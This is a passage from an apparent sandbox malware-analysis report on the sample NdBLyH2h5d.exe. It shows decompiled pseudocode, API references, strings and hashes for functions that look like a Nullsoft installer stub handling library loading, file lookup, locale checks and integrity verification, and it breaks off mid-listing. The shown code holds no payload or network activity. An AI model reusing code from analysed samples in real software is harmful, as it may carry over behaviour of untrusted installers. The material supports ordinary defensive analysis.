                                                                              • Opcode Fuzzy Hash: 64ebc9382491af248a9db53b96dac7511460e5add4ad8dec7203493ad6a04ced
                                                                              • Instruction Fuzzy Hash: 9721B476600364BFE7209AB28CADFDB7FBCEB04B50F100565BA02D6080DA7496498F20
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 64%
                                                                              			E00401FDC(int __ebx) {
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t27;
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001); // executed
				if( *0x7a3030 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9A(0xfffffff0);
					 *(_t37 + 8) = E00402A9A(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t20 = LoadLibraryA(_t35); // executed
						_t33 = _t20;
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t27 = GetModuleHandleA(_t35); // executed
						_t33 = _t27;
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D62(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
				return 0;
			}










                                                                              0x00401fdc
                                                                              0x00401fe4
                                                                              0x00401fe7
                                                                              0x00401ff3
                                                                              0x00402093
                                                                              0x00000000
                                                                              0x00401ff9
                                                                              0x00402001
                                                                              0x0040200b
                                                                              0x0040200e
                                                                              0x0040201d
                                                                              0x0040201e
                                                                              0x00402024
                                                                              0x00402028
                                                                              0x0040208f
                                                                              0x00402095
                                                                              0x00402095
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402010
                                                                              0x00402011
                                                                              0x00402017
                                                                              0x0040201b
                                                                              0x0040202a
                                                                              0x00402034
                                                                              0x00402038
                                                                              0x0040207c
                                                                              0x0040203a
                                                                              0x0040203d
                                                                              0x00402040
                                                                              0x00402070
                                                                              0x00402042
                                                                              0x00402045
                                                                              0x0040204e
                                                                              0x00402050
                                                                              0x00402050
                                                                              0x0040204e
                                                                              0x00402040
                                                                              0x00402084
                                                                              0x00402087
                                                                              0x00402087
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040201b
                                                                              0x0040200e
                                                                              0x0040209b
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                                                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                                • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                                • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                              • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                                                              • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                                                              • SetErrorMode.KERNEL32 ref: 0040209B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 1609199483-0
                                                                              • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                              • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
                                                                              • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                              • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00405C94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24fileCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00405C94(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x7a15d0;
			}





                                                                              0x00405ca2
                                                                              0x00405cae
                                                                              0x00405cb6
                                                                              0x00405cb8
                                                                              0x00405cbd
                                                                              0x00000000
                                                                              0x00405cca
                                                                              0x00405cc0
                                                                              0x00000000

                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ), ref: 00405CA2
                                                                              • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                              • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                              • FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: ErrorFindMode$CloseFileFirst
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2885216544-3916508600
                                                                              • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                              • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
                                                                              • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                              • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00403526, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215stringregistrylibraryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E00403526() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x7a2f88;
				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x79f580;
					"1033" = 0x7830;
					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
					__eflags =  *0x79f580;
					if(__eflags == 0) {
						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
					}
					lstrcatA("1033", _t78);
				} else {
					E0040591D("1033",  *_t20() & 0x0000ffff);
				}
				E004037F2(_t75, _t88);
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
				if(E004055AC(_t88, _t84) != 0) {
					L16:
					if(E004055AC(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059E1(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a2768 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E004037F2(_t75, __eflags);
							__eflags =  *0x7a3020;
							if( *0x7a3020 != 0) {
								_t31 = E00404E34(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x7a274c;
								if( *0x7a274c == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x79f560, 5);
							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092B6 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x4092ac = 0;
								GetClassInfoA(0, _t82, 0x7a2720);
								 *0x7a2744 = _t82;
								 *0x4092ac = 0x32;
								RegisterClassA(0x7a2720);
							}
							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x7a2f80;
						 *0x7a2734 = _t28;
						_v20 = 0x624e5f;
						 *0x7a2724 = E00401000;
						 *0x7a2730 =  *0x7a2f80;
						 *0x7a2744 =  &_v20;
						if(RegisterClassA(0x7a2720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x7a1f20;
					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
					_t61 =  *0x7a1f20; // 0x52
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x7a1f21;
						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
						E004059BF(_t84, E004054CC(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405513(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}



























                                                                              0x0040352c
                                                                              0x0040353d
                                                                              0x00403544
                                                                              0x00403546
                                                                              0x0040355a
                                                                              0x0040355f
                                                                              0x00403575
                                                                              0x0040357a
                                                                              0x00403580
                                                                              0x00403592
                                                                              0x00403592
                                                                              0x0040359d
                                                                              0x00403548
                                                                              0x00403553
                                                                              0x00403553
                                                                              0x004035a2
                                                                              0x004035ac
                                                                              0x004035b5
                                                                              0x004035c1
                                                                              0x00403647
                                                                              0x0040364f
                                                                              0x00403651
                                                                              0x00403657
                                                                              0x00403658
                                                                              0x00403658
                                                                              0x0040366e
                                                                              0x00403674
                                                                              0x00403682
                                                                              0x00403711
                                                                              0x00403719
                                                                              0x00403723
                                                                              0x00403728
                                                                              0x0040372e
                                                                              0x004037c0
                                                                              0x004037c5
                                                                              0x004037c7
                                                                              0x004037e3
                                                                              0x00000000
                                                                              0x004037e3
                                                                              0x004037c9
                                                                              0x004037cf
                                                                              0x004037d7
                                                                              0x004037d7
                                                                              0x00000000
                                                                              0x004037cf
                                                                              0x0040373c
                                                                              0x00403748
                                                                              0x0040374e
                                                                              0x00403750
                                                                              0x00403752
                                                                              0x00403755
                                                                              0x0040375e
                                                                              0x0040375e
                                                                              0x00403766
                                                                              0x0040376e
                                                                              0x00403770
                                                                              0x00403772
                                                                              0x00403777
                                                                              0x0040377d
                                                                              0x00403780
                                                                              0x00403786
                                                                              0x0040378d
                                                                              0x0040378d
                                                                              0x004037ac
                                                                              0x004037b6
                                                                              0x00000000
                                                                              0x004037bb
                                                                              0x0040371b
                                                                              0x0040371d
                                                                              0x00000000
                                                                              0x00403688
                                                                              0x00403688
                                                                              0x0040368e
                                                                              0x00403698
                                                                              0x004036a0
                                                                              0x004036aa
                                                                              0x004036b0
                                                                              0x004036be
                                                                              0x004037e8
                                                                              0x004037e8
                                                                              0x00000000
                                                                              0x004037e8
                                                                              0x004036c4
                                                                              0x004036cd
                                                                              0x0040370c
                                                                              0x00000000
                                                                              0x0040370c
                                                                              0x004035c7
                                                                              0x004035c7
                                                                              0x004035cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004035d6
                                                                              0x004035e5
                                                                              0x004035ea
                                                                              0x004035f1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004035f5
                                                                              0x004035f7
                                                                              0x00403604
                                                                              0x00403604
                                                                              0x0040360c
                                                                              0x00403612
                                                                              0x0040363a
                                                                              0x00403642
                                                                              0x00000000
                                                                              0x00403624
                                                                              0x00403625
                                                                              0x0040362e
                                                                              0x00403634
                                                                              0x00403635
                                                                              0x00000000
                                                                              0x00403635
                                                                              0x00403630
                                                                              0x00403632
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403632
                                                                              0x00403612

                                                                              APIs
                                                                                • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                                • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                                • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                              • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
                                                                              • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 00403607
                                                                              • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
                                                                              • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
                                                                              • LoadImageA.USER32 ref: 0040366E
                                                                              • RegisterClassA.USER32 ref: 004036B5
                                                                                • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
                                                                              • CreateWindowExA.USER32 ref: 00403706
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 0040373C
                                                                              • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
                                                                              • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
                                                                              • GetClassInfoA.USER32 ref: 0040376E
                                                                              • GetClassInfoA.USER32 ref: 0040377D
                                                                              • RegisterClassA.USER32 ref: 0040378D
                                                                              • DialogBoxParamA.USER32 ref: 004037AC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: 'z$"C:\Users\user\Desktop\NdBLyH2h5d.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
                                                                              • API String ID: 914957316-618799758
                                                                              • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                              • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
                                                                              • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                              • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 81%
                                                                              			E00402C37(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				long _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t52;
				signed int _t56;
				void* _t62;
				intOrPtr* _t66;
				long _t67;
				signed int _t73;
				signed int _t78;
				signed int _t79;
				long _t84;
				intOrPtr _t89;
				void* _t91;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t97;
				signed int _t101;
				void* _t102;

				_v8 = 0;
				_t52 = GetTickCount();
				_v16 = 0;
				_v12 = 0;
				_t100 = "C:\\Users\\hardz\\Desktop";
				_t97 = _t52 + 0x3e8;
				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\hardz\\Desktop", 0x400);
				_t91 = E00405690(_t100, 0x80000000, 3);
				_v20 = _t91;
				 *0x409020 = _t91;
				if(_t91 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405513(_t100);
				_t56 = GetFileSize(_t91, 0);
				__eflags = _t56;
				 *0x79d938 = _t56;
				_t101 = _t56;
				if(_t56 <= 0) {
					L27:
					__eflags =  *0x7a2f8c;
					if( *0x7a2f8c == 0) {
						goto L33;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L31:
						_t102 = GlobalAlloc(0x40, _v28);
						E004030FF( *0x7a2f8c + 0x1c);
						_push(_v28);
						_push(_t102);
						_push(0);
						_push(0xffffffff);
						_t62 = E00402EBD();
						__eflags = _t62 - _v28;
						if(_t62 == _v28) {
							__eflags = _a4 & 0x00000002;
							 *0x7a2f88 = _t102;
							if((_a4 & 0x00000002) != 0) {
								 *_t102 =  *_t102 | 0x00000008;
								__eflags =  *_t102;
							}
							__eflags = _v48 & 0x00000001;
							 *0x7a3020 =  *_t102 & 0x00000018;
							 *0x7a2f90 =  *_t102;
							if((_v48 & 0x00000001) != 0) {
								 *0x7a2f94 =  *0x7a2f94 + 1;
								__eflags =  *0x7a2f94;
							}
							_t49 = _t102 + 0x44; // 0x44
							_t66 = _t49;
							_t93 = 8;
							do {
								_t66 = _t66 - 8;
								 *_t66 =  *_t66 + _t102;
								_t93 = _t93 - 1;
								__eflags = _t93;
							} while (_t93 != 0);
							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t102 + 0x3c) = _t67;
							E00405670(0x7a2fa0, _t102 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						GlobalFree(_t102);
						goto L33;
					}
					E004030FF( *0x789930);
					_t73 = E004030CD( &_v12, 4); // executed
					__eflags = _t73;
					if(_t73 == 0) {
						goto L33;
					}
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						goto L33;
					}
					goto L31;
				} else {
					do {
						_t92 = _t101;
						asm("sbb eax, eax");
						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
						__eflags = _t101 - _t78;
						if(_t101 >= _t78) {
							_t92 = _t78;
						}
						_t79 = E004030CD(0x795938, _t92); // executed
						__eflags = _t79;
						if(_t79 == 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L33:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						__eflags =  *0x7a2f8c;
						if( *0x7a2f8c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								__eflags = _v8;
								if(_v8 == 0) {
									_t84 = GetTickCount();
									__eflags = _t84 - _t97;
									if(_t84 > _t97) {
										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
									}
								} else {
									E00405CFC(0);
								}
							}
							goto L22;
						}
						E00405670( &_v48, 0x795938, 0x1c);
						_t94 = _v48;
						__eflags = _t94 & 0xfffffff0;
						if((_t94 & 0xfffffff0) != 0) {
							goto L22;
						}
						__eflags = _v44 - 0xdeadbeef;
						if(_v44 != 0xdeadbeef) {
							goto L22;
						}
						__eflags = _v32 - 0x74736e49;
						if(_v32 != 0x74736e49) {
							goto L22;
						}
						__eflags = _v36 - 0x74666f73;
						if(_v36 != 0x74666f73) {
							goto L22;
						}
						__eflags = _v40 - 0x6c6c754e;
						if(_v40 != 0x6c6c754e) {
							goto L22;
						}
						_t89 = _v24;
						__eflags = _t89 - _t101;
						if(_t89 > _t101) {
							goto L33;
						}
						_a4 = _a4 | _t94;
						_t95 =  *0x789930; // 0x32903
						__eflags = _a4 & 0x00000008;
						 *0x7a2f8c = _t95;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t24 = _t89 - 4; // 0x1c
							_t101 = _t24;
							__eflags = _t92 - _t101;
							if(_t92 > _t101) {
								_t92 = _t101;
							}
							goto L22;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L15;
						L22:
						__eflags = _t101 -  *0x79d938; // 0x32907
						if(__eflags < 0) {
							_v16 = E00405D2F(_v16, 0x795938, _t92);
						}
						 *0x789930 =  *0x789930 + _t92;
						_t101 = _t101 - _t92;
						__eflags = _t101;
					} while (_t101 > 0);
					__eflags = _v8;
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}
































                                                                              0x00402c42
                                                                              0x00402c45
                                                                              0x00402c4b
                                                                              0x00402c4e
                                                                              0x00402c51
                                                                              0x00402c64
                                                                              0x00402c6a
                                                                              0x00402c7d
                                                                              0x00402c82
                                                                              0x00402c85
                                                                              0x00402c8b
                                                                              0x00000000
                                                                              0x00402c8d
                                                                              0x00402c98
                                                                              0x00402ca0
                                                                              0x00402ca6
                                                                              0x00402ca8
                                                                              0x00402cad
                                                                              0x00402caf
                                                                              0x00402dde
                                                                              0x00402de0
                                                                              0x00402de6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402de8
                                                                              0x00402deb
                                                                              0x00402e0f
                                                                              0x00402e1a
                                                                              0x00402e25
                                                                              0x00402e2a
                                                                              0x00402e2d
                                                                              0x00402e2e
                                                                              0x00402e2f
                                                                              0x00402e31
                                                                              0x00402e36
                                                                              0x00402e39
                                                                              0x00402e5a
                                                                              0x00402e5e
                                                                              0x00402e64
                                                                              0x00402e66
                                                                              0x00402e66
                                                                              0x00402e66
                                                                              0x00402e6e
                                                                              0x00402e72
                                                                              0x00402e79
                                                                              0x00402e7e
                                                                              0x00402e80
                                                                              0x00402e80
                                                                              0x00402e80
                                                                              0x00402e88
                                                                              0x00402e88
                                                                              0x00402e8b
                                                                              0x00402e8c
                                                                              0x00402e8c
                                                                              0x00402e8f
                                                                              0x00402e91
                                                                              0x00402e91
                                                                              0x00402e91
                                                                              0x00402e9b
                                                                              0x00402ea1
                                                                              0x00402eaf
                                                                              0x00402eb4
                                                                              0x00000000
                                                                              0x00402eb4
                                                                              0x00402e3c
                                                                              0x00000000
                                                                              0x00402e3c
                                                                              0x00402df3
                                                                              0x00402dfe
                                                                              0x00402e03
                                                                              0x00402e05
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402e0a
                                                                              0x00402e0d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402cb5
                                                                              0x00402cb5
                                                                              0x00402cba
                                                                              0x00402cbe
                                                                              0x00402cc5
                                                                              0x00402cca
                                                                              0x00402ccc
                                                                              0x00402cce
                                                                              0x00402cce
                                                                              0x00402cd6
                                                                              0x00402cdb
                                                                              0x00402cdd
                                                                              0x00402e49
                                                                              0x00402e4d
                                                                              0x00402e52
                                                                              0x00402e52
                                                                              0x00402e42
                                                                              0x00000000
                                                                              0x00402e42
                                                                              0x00402ce5
                                                                              0x00402ceb
                                                                              0x00402d6c
                                                                              0x00402d70
                                                                              0x00402d72
                                                                              0x00402d75
                                                                              0x00402d7f
                                                                              0x00402d85
                                                                              0x00402d87
                                                                              0x00402da3
                                                                              0x00402da3
                                                                              0x00402d77
                                                                              0x00402d78
                                                                              0x00402d78
                                                                              0x00402d75
                                                                              0x00000000
                                                                              0x00402d70
                                                                              0x00402cf8
                                                                              0x00402cfd
